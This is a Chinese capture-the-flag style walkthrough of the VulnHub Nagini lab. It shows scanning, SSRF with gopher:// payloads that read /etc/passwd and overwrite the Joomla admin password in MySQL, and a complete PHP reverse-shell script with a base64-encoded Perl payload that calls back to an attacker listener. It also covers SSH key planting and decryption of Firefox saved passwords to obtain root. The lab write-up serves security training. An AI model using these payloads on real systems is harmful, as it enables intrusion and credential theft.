vlunhub之Nagini(详细过程) - Go语言中文社区

vlunhub之Nagini(详细过程)

写在前面:

首先这篇文章是老师上课讲的一个靶场,然后就是复现一下。来来回回也折腾了两三天,也认识到自己真的太弱了,中间可能会有一些不太连贯甚至是突兀的地方,能力所限只能写到这个程度。也是参考了两位大神写好的复现过程(照着抄我都抄不来,我真实太。。。。。),也有很多知识点都不太懂都是生搬硬套来的,所以等以后明白再来修改,所以这篇文章会随着个人的成长不断更新和完善

大家可以参考原文:

http://www.vxer.cn/?id=80

https://nepcodex.com/2021/05/vulnhub-nagini-walkthrough-harry-potter-series/

目录

信息搜集

扫描网段

扫描端口

扫描网站目录文件

查看文件内容

发现漏洞

根据该CMS的特性扫描该IP地址

查看配置文件,发现关键信息

查数据库名

查表名

查询表中的列

查询数据

更新密码到数据库中

尝试登录后台

尝试反弹shell

成功getshell

权限提升

拿到第一个加密数据

进到家目录下查看

成功登录snape用户

成功登录hermoine用户

拿到第二个加密数据

权限提升

拿到管理员权限

拿到最后一个加密数据

信息搜集

扫描网段

nmap -sP 192.168.179.0/24

扫描端口

nmap -sS -sV -p- -v 192.168.179.130

扫描网站目录文件

gobuster dir -u http://192.168.179.130 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

兄弟萌说实话,这个扫描的代码是我参考别人的,我一开始是直接拿dir直接扫域名的,那样也可以爆出这些文件,但是因为没有过滤所以目录巨多,都得一个一个得去看。所以学一下大神增加一下效率

查看文件内容

这边是意思需要http3环境才能看到网页内隐藏的内容,但是我实在做不到,就这个环境真的搞了好久也没有搭建起来,无奈只能先跳过这一步了,我把相关的一些文章贴在下面,需要配置环境的师傅们也可以参考一下(如果搭成功了,也希望各位师傅不吝赐教,指点一二)

GITHUB上的高赞:https://github.com/curl/curl/blob/master/docs/HTTP3.md

另一种解决方法: https://github.com/cloudflare/quiche

一篇相关的博客:http://m.blog.chinaunix.net/uid-405749-id-5844453.html

发现漏洞

这个是页面中隐藏的信息,虽然我跳过了但是还是贴出来吧省的大家看的云里雾里的

 

http://192.168.179.130/internalResourceFeTcher.php?url=file:///etc/passwd

根据该CMS的特性扫描该IP地址

joomscan -u http://192.168.179.130/joomla -ec

这明显是一个配置文件

查看配置文件,发现关键信息

 

wget http://192.168.179.130/joomla/configuration.php.bak 
cat configuration.php.bak

 

下面会使用到Gopherus:https://github.com/tarunkant/Gopherus

运行需要安装pip2 ,如果kali没有pip2 参考

https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
 pip2

我们现在只知道用户名,然后密码没有设置,利用gopherus工具

用户名是我们知道的,后面是我们要用的查询语句,最后是生成的payload,需要将整个复制下来进行url编码,最后拼接到http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=  后面,并且gopher:%2f%2f127.0.0.1:3306%2f_ 前面这段必须是这样的

查数据库名

http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2510%2500%2500%2500%2503%2573%2568%256f%2577%2520%2564%2561%2574%2561%2562%2561%2573%2565%2573%253b%2501%2500%2500%2500%2501

访问网址的时候如果一次不出结果就多刷新几次试试

查表名

USE joomla; SHOW tables;
http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2518%2500%2500%2500%2503%2555%2553%2545%2520%256a%256f%256f%256d%256c%2561%253b%2553%2548%254f%2557%2520%2574%2561%2562%256c%2565%2573%253b%2501%2500%2500%2500%2501

查询表中的列

USE joomla; SELECT * FROM joomla_users;
http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2528%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2520%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501

查询数据

http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%255c%2500%2500%2500%2503%2555%2553%2545%2520%256a%256f%256f%256d%256c%2561%253b%2520%2553%2545%254c%2545%2543%2554%2520%2570%2561%2573%2573%2577%256f%2572%2564%2520%2546%2552%254f%254d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%2520%2557%2548%2545%2552%2545%2520%2565%256d%2561%2569%256c%253d%25e2%2580%2599%2573%2569%2574%2565%255f%2561%2564%256d%2569%256e%2540%256e%2561%2567%2569%256e%2569%252e%2568%256f%2567%2577%2561%2572%2574%2573%25e2%2580%2599%253b%2501%2500%2500%2500%2501

我也不知道哪里出了错就是有语法错误,就先不管这个了

首先我们已知用户名为goblin,密码为空,所以我们可以通过updata将我们自己设置的密码更新到数据库中这样我们就可以登录了

我们选择的密码是password md5值为:5f4dcc3b5aa765d61d8327deb882cf99

更新密码到数据库中

USE joomla; UPDATE joomla_users SET password=’5f4dcc3b5aa765d61d8327deb882cf99′ WHERE email=’site_admin@nagini.hogwarts’;
http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%258a%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2520%2575%2570%2564%2561%2574%2565%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%2520%2573%2565%2574%2520%2570%2561%2573%2573%2577%256f%2572%2564%2520%253d%2520%2527%2535%2566%2534%2564%2563%2563%2533%2562%2535%2561%2561%2537%2536%2535%2564%2536%2531%2564%2538%2533%2532%2537%2564%2565%2562%2538%2538%2532%2563%2566%2539%2539%2527%2520%2577%2568%2565%2572%2565%2520%2575%2573%2565%2572%256e%2561%256d%2565%253d%2527%2573%2569%2574%2565%255f%2561%2564%256d%2569%256e%2527%253b%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501

 

 

 

成功将密码更新到数据库中

尝试登录后台

账号:site_admin

密码:password

尝试反弹shell

首先在kali上开启监听端口

登录后台写入脚本

 

 

点击上方的newfie 新建一个文件

 

写入php反弹代码

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.179.145";
$yourport = '1234';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

代码我贴在这边了,这个代码是我从网上找的,本来想贴一下原作者的链接,找了半天没找到

这个也很方便只需要把自己的IP地址和监听的端口号改了就可以

访问文件位置

http://192.168.179.130/joomla/templates/protostar/rev.php

成功getshell

利用python建立可交互式shell

 

python3 -c "import pty;pty.spawn('/bin/bash')"

权限提升

进入网站目录下,并且发现一个txt文件

 

拿到第一个加密数据

查看txt文件内容

cat horcrux1.txt


horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}

内容格式类似于flag,猜测应该是加密过的,但是没有猜到是什么方式加密的,先记录下来

根据后面的值猜测加密方式都是一样所以同样使用base64解密后得到

3: SlythEriN's LocKEet dEstroYeD bY RoN

 

进到家目录下查看

发现两个目录,先进第一个进去看看

查看txt文件

没有权限什么也看不到

查看bin目录下的文件

cat su_cp

没办法只能回到最初的起点,到家目录下的另一个目录看一下

想查看一下这个文件

cat .creds.txt

TG92ZUBsaWxseQ==

这个就很明显是base64加密过的解码看看

Love@lilly

好像是个邮箱,也可能是snape的密码

成功登录snape用户

使用ssh登录

ssh snape@192.168.179.130

在kali中

ssh-keygen
一直回车到最后

将该内容复制到snap下的/home/snape

 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNBF+fV2dq2xFfrDKepkzr5WRN2FDhL93YsS3wmz9nrcNvW6P/DHUyLvTm1nxSKbnvNZxwOH7mYU6+U220bKWaJr9VkRpWpYc/jblM+bphrtlH4kdnjDA0zg+CbmYQ6m3O1JBOy8L8Uu0QpRrTfHo3nWNfc8D9APVd6oQfN0Ep4NY3HthZFhNh71Nh+Cjty08HQCcyyTLe7m0DXmiFECB+aKpw2bn/UUlUYSN290FaRYrtGm/nv8GSaUMkNyhv67zGhw8Mp3+5rdV60T4m1zMk4n4Q0SZ/NUQsktCSZszoQWserGDtndfeZRPUTd8g4S+5XFcLGZsBdkBSWoX+S+3aDdzgcS5RWd7krkdbnvmCODt0HKRnPBKF2MEwGP4Ztxai75OPHLTw3V3op6pMJrE72OSzdfwMF6ZCCIS2obtBegRmHlY4FbqzXFESwIn+81VBIO9M6K0nHuKJDnlZJXlGZj9N4SEM5dy76tp13ZpR6DcMHCaATs6HUb91z4VFEk0= root@locahost
<M5dy76tp13ZpR6DcMHCaATs6HUb91z4VFEk0= root@locahost
> " >authorized_keys

chmod 640 authorized_keys
ls -al

 

cd /home/hermoine/bin
./su_cp -p /home/snape/authorized_keys /home/hermoine/.ssh/
ls -al


在kali上
ssh hermoine@192.168.179.130 -i .ssh/id_rsa 

#########
我们上面做了这么多就是为了可以不用密码登录hermoine这个用户

成功登录hermoine用户

 

拿到第二个加密数据

查看horcrux2.txt.这个文件

cat horcrux2.txt
horcrux_{NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVybWlvbmU=}

这个明显是base64加密后的密文,解密后得到

4: Helga Hufflepuff's Cup destroyed by Hermione

权限提升

cd .mozilla/firefox/g2mhbq0o.default/
ls -al

which python
which python3

利用python3创建一个http服务

python3 -m http.server 9000

利用工具读出浏览器中的用户名和密码

GITHUB:https://github.com/lclevy/firepwd

下载安装包到本地并解压

unzip firepwd-master.zip
cd firepwd-master 
sudo pip install -r requirements.txt

mkdir creds
cd creds
cp ~/Desktop/firepwd-master/firepwd.py ~/Desktop/firepwd-master/creds 
wget http://192.168.179.130:9000//logins.json
wget http://192.168.179.130:9000//key4.db

运行

python3 firepwd.py

成功爆出管理员的账号和密码

但是这边我运行的时候爆了一个ModuleNotFoundError: No module named 'Crypto'

pip3 install pycrypto    安装这个模块

然后又爆了一个错误ModuleNotFoundError: No module named 'Crypto.Util.Padding'

pip3 install pycryptodome        再安装一个模块

就可以顺利运行了

拿到管理员权限

通过拿到的账号和密码登录

账号:root

密码:@Alohomora#123

 

cd /home/root
ls -al

拿到最后一个加密数据

查看txt文件

 cat horcrux3.txt




horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}

解密

拿到最后一段加密的数据

5: Diadem of Ravenclaw destroyed by Harry

 

版权声明:本文来源CSDN,感谢博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/weixin_50688050/article/details/117445091
站方申明:本站部分内容来自社区用户分享,若涉及侵权,请联系站方删除。
  • 发表于 2023-01-02 14:48:56
  • 阅读 ( 115 )
  • 分类:Go Web框架

你可能感兴趣的文章

精选的优质文章

0 条评论

请先 登录 后评论

官方社群

GO教程

推荐文章

猜你喜欢

随便看看

来源51CTO

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!